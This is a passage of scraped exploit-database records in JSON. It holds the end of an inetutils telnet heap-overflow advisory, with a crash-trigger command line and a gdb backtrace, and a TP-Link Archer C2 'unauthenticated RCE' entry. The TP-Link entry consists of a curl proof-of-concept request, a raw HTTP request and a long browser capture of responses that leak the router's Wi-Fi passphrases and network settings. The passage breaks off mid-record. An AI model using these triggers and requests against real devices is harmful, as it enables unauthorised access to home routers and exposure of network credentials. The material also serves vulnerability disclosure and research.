triggering this issue on inetutils in Arch Linux can be seen below:\r\n\r\nDISPLAY=`perl -e 'print Ax\"50000\"'` telnet -l`perl -e 'print \"A\"x5000'` 192.168.69.1\r\nTrying 192.168.69.1...\r\nConnected to 192.168.69.1.\r\nEscape character is '^]'.\r\nrealloc(): invalid next size\r\nAborted (core dumped)\r\n\r\nThese issues are present anywhere that inetutils is used as a base for clients\r\nsuch as in common embedded home routers or networking equipment. An attacker\r\ncan potentially exploit these vulnerabilities to gain arbitrary code execution\r\non platforms where telnet commands are available. An example debug trace of the\r\nheap overflow can be found below:\r\n\r\n(gdb) run -l`perl -e 'print \"A\"x5000'` 192.168.69.1\r\nStarting program: /usr/bin/telnet -l`perl -e 'print \"A\"x5000'` 192.168.69.1\r\nTrying 192.168.69.1...\r\nConnected to 192.168.69.1.\r\nEscape character is '^]'.\r\nrealloc(): invalid next size\r\n\r\nProgram received signal SIGABRT, Aborted.\r\n0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6\r\n(gdb) bt\r\n#0 0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6\r\n#1 0x00007ffff7d72672 in abort () from /usr/lib/libc.so.6\r\n#2 0x00007ffff7dca878 in __libc_message () from /usr/lib/libc.so.6\r\n#3 0x00007ffff7dd118a in malloc_printerr () from /usr/lib/libc.so.6\r\n#4 0x00007ffff7dd52ac in _int_realloc () from /usr/lib/libc.so.6\r\n#5 0x00007ffff7dd62df in realloc () from /usr/lib/libc.so.6\r\n#6 0x000055555556029c in ?? ()\r\n#7 0x0000555555560116 in ?? ()\r\n#8 0x000055555556049f in ?? ()\r\n#9 0x00005555555606b7 in ?? ()\r\n#10 0x00005555555616de in ?? ()\r\n#11 0x0000555555561b8d in ?? ()\r\n#12 0x0000555555562122 in ?? ()\r\n#13 0x000055555555c6f4 in ?? ()\r\n#14 0x00005555555591e7 in ?? ()\r\n#15 0x00007ffff7d74223 in __libc_start_main () from /usr/lib/libc.so.6\r\n#16 0x00005555555592be in ?? ()\r\n\r\nDue to the various devices embedding telnet from inetutils and distributions\r\nsuch as Arch Linux using inetutils telnet, it is unclear the full impact and all\r\nscenarios where this issue could be leveraged. An attacker may seek to exploit\r\nthese vulnerabilities to escape restricted shells.\r\n\r\n-- Hacker Fantastic (11/12/2018)\r\n\r\nhttps://hacker.house\n\n# 0day.today [2018-12-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31805"}, {"lastseen": "2018-07-24T02:13:58", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-23T00:00:00", "published": "2018-07-23T00:00:00", "id": "1337DAY-ID-30759", "href": "https://0day.today/exploit/description/30759", "title": "TP-Link Archer C2 v3.0 UnAuthenticated Remote Code Execution Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: [UnAuthenticated Remote Code Execution at TP-Link Archer C2 Router]\r\n# Date: [17.07.2018] \r\n# Exploit Author: [Ismail Tasdelen]\r\n# Vendor Homepage: [https://www.tp-link.com/]\r\n# Hardware Link : [https://www.tp-link.com/la/products/details/cat-9_Archer-C2.html]\r\n# Hardware Version : [Archer C2 v3.0]\r\n# Firmware Version : [3.0.0 Build 20160713 Rel. 74035(EU)]\r\n# Vulernability Type : [RCE - Remote Code Execution]\r\n# Vulenrability : [UnAuthenticated Remote Code Execution]\r\n# Risk : [High]\r\n\r\n# Description : What is remote code execution vulnerability ?\r\n\r\nVulnerabilities can provide an attacker with the ability to execute malicious code and take complete control of an affected system with the privileges of the user running the application. Remote code execution can be best described as an action which involves an attacker executing code remotely using system vulnerabilities. Such code can run from a remote server, which means that the attack can originate from anywhere around the world giving the attacker access to the PC. Once a hacker gains access to a system, they\u2019ll be able to make changes within the target computer.The attacker leverages the user\u2019s admin privileges to allow them to execute code and make further changes to the computer. It\u2019s often the case that such user privileges become elevated. Attackers usually look to gain further control on the system they already have a grip on and look to exert control onto other computers on the same network.\r\n\r\n# POC:\r\n\r\n# cURL Request :\r\n\r\ncurl 'http://198.168.0.1:8081/cgi-bin/luci/;stok=78c53e5bb36166c34245a44bd99edd59/admin/ledgeneral?form=setting' -H 'Host: 198.168.0.1:8081' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://198.168.0.1:8081/webpages/index.html' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: sysauth=50e6c4175557343bb0aac91fa2e0ce7f' -H 'Connection: keep-alive' --data 'operation=write'\r\n\r\n# HTTP Request :\r\n\r\nPOST /cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/ledgeneral?form=setting HTTP/1.1\r\nHost: 198.168.0.1:8081\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://198.168.0.1:8081/webpages/index.html\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 15\r\nCookie: sysauth=e3638eb1f1952c2a56bd50f466603048\r\nConnection: keep-alive\r\n\r\n# HTTP Response :\r\n\r\nHTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: application/json\r\nCache-Control: no-cache\r\nExpires: 0\r\n\r\nJSON Data :\r\n\r\n{\r\n \"log\": {\r\n \"version\": \"1.1\",\r\n \"creator\": {\r\n \"name\": \"Firefox\",\r\n \"version\": \"52.9.0\"\r\n },\r\n \"browser\": {\r\n \"name\": \"Firefox\",\r\n \"version\": \"52.9.0\"\r\n },\r\n \"pages\": [\r\n {\r\n \"startedDateTime\": \"2018-07-17T13:09:51.042+03:00\",\r\n \"id\": \"page_1\",\r\n \"title\": \"Wireless Router Archer C2\",\r\n \"pageTimings\": {\r\n \"onContentLoad\": -1,\r\n \"onLoad\": -1\r\n }\r\n }\r\n ],\r\n \"entries\": [\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:09:51.042+03:00\",\r\n \"time\": 930,\r\n \"request\": {\r\n \"bodySize\": 15,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/ledgeneral?form=setting\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"15\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"setting\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=write\"\r\n },\r\n \"headersSize\": 577\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 79,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"enable\\\":\\\"off\\\",\\\"time_set\\\":\\\"yes\\\",\\\"ledpm_support\\\":\\\"yes\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 79\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 0,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 922,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:09:59.652+03:00\",\r\n \"time\": 987,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.07,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 282,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 681,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:09:59.659+03:00\",\r\n \"time\": 1832,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 275,\r\n \"dns\": 250,\r\n \"connect\": 526,\r\n \"send\": 0,\r\n \"wait\": 773,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:09.643+03:00\",\r\n \"time\": 978,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":